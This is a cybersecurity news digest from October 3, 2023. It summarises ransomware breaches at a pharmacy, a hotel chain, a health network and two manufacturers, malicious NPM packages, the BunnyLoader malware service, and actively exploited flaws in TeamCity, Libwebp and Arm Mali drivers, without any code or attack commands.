We use cookies to improve your experience. Do you accept?

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Oct 3, 2023

In a rare occurrence, two CVEs were assigned to a critical security flaw known as the Libwebp flaw; the second CVE was rejected shortly after. Several top firms warned regarding the exploitation of the flaw to achieve RCE and urged users to immediately apply the patch. Nevertheless, this isn’t the only security issue that cybercriminals are capitalizing on. Vulnerabilities in JetBrains TeamCity and Mali GPU drivers have also come under attack by adversaries. Separately, nine sets of malicious NPM packages were observed stealing sensitive data using webhooks or file-sharing links.

Moving on, a new Malware-as-a-Service (MaaS) is gaining popularity among cybercriminals due to its feature-rich nature and low cost. Dubbed BunnyLoader, the malware targets web browsers, cryptocurrency wallets, VPN clients, and messaging apps to steal various sensitive information.

Top Breaches Reported in the Last 24 Hours

Ransomware group attacks pharma firm

The Lorenz ransomware group claimed responsibility for a cyberattack on Allcare Pharmacy, which exposed its client information. While Allcare Pharmacy has not issued an official response, the threat actors have shared parts of the stolen data as evidence. Lorenz ransomware has been targeting high-profile organizations since 2021.

Motel One Group confirms ransomware attack

Motel One Group, a budget hotel chain, confirmed experiencing a ransomware attack by the BlackCat ransomware group. The attackers accessed customer information, including 150 credit card details, and have claimed to have exfiltrated approximately 6TB of data, including 24 million files. The company stated that while the attackers attempted to deploy file-encrypting ransomware, their efforts were only partially successful and business operations were not at risk.

**Patient data leaked by ECHN **

The cyberattack against the Eastern Connecticut Health Network (ECHN) in August resulted in the theft of employee and patient names, SSNs, confidential health information, and financial information, according to Prospect Medical Holdings, ECHN's parent company. Criminals accessed and acquired files containing information on employees and dependents of Waterbury Hospital, Rockville General Hospital, and Manchester Memorial Hospital. Notification letters were also sent to 24,130 Connecticut residents.

MEDUSA ransomware operators strike again

The notorious MEDUSA ransomware group has resurfaced, targeting two high-profile companies: Karam Chand Thapar & Bros. in India and Windak Group in Sweden. The threat actors have demanded $200,000 and $100,000 in ransom, respectively, with a deadline of 10 days. The MEDUSA group's dark web portal listed both victims, continuing a recent spree of attacks. The group is known for double extortion tactics and primarily targeting Windows systems through phishing campaigns and exploiting vulnerable RDP servers.

Top Malware Reported in the Last 24 Hours

Numerous malicious NPM packages discovered

Researchers at FortiGuard Labs uncovered nine sets of malicious NPM packages designed to steal sensitive data, including system information, user credentials, and source code. These malicious packages use install scripts to exfiltrate data to webhooks or file-sharing links, potentially compromising the security of compromised systems. The packages were discovered using a system designed to detect malicious open-source packages across multiple ecosystems. Researchers categorized these packages based on their intentions and tactics.

New fileless MaaS operation

Security researchers have identified a new MaaS called BunnyLoader advertised on hacker forums as a fileless loader with the ability to steal and replace the contents of the system clipboard. The malware appears to be under development and boasts features such as downloading and executing payloads, keylogging, credential stealing, clipboard manipulation, and remote command execution. Additionally, the malware supports multiple anti-detection mechanisms.

Top Vulnerabilities Reported in the Last 24 Hours

Ransomware gangs abuse JetBrains TeamCity flaw

Multiple ransomware groups are reportedly targeting a recently patched critical vulnerability in JetBrains' TeamCity continuous integration and deployment server. Tracked as CVE-2023-42793, with a 9.8/10 severity score, the flaw allows unauthenticated attackers to gain remote code execution after exploiting an authentication bypass weakness. The vulnerability was published with technical details one week after JetBrains released the patch.

Active exploitation of Libwebp bug

Several companies have released advisories addressing the impact of an actively exploited Libwebp vulnerability tracked as CVE-2023-4863. The flaw concerns the WebP component in web browsers and applications using the Libwebp library. Although both Apple and Google patched similar vulnerabilities in their products, Google initially assigned a new CVE identifier (CVE-2023-5129) for Libwebp, but later rejected it. The vulnerability could lead to arbitrary code execution.

Arm patches Mali GPU Kernel Driver bug

Arm issued security patches for a security flaw in its Mali GPU Kernel Driver. Identified as CVE-2023-4211, the vulnerability is being actively exploited. It could allow a local non-privileged user to access already freed memory by making improper GPU memory processing operations. The flaw impacts various driver versions, including Midgard GPU Kernel Driver, Bifrost GPU Kernel Driver, Valhall GPU Kernel Driver, and Arm 5th Gen GPU Architecture Kernel Driver.

Related Threat Briefings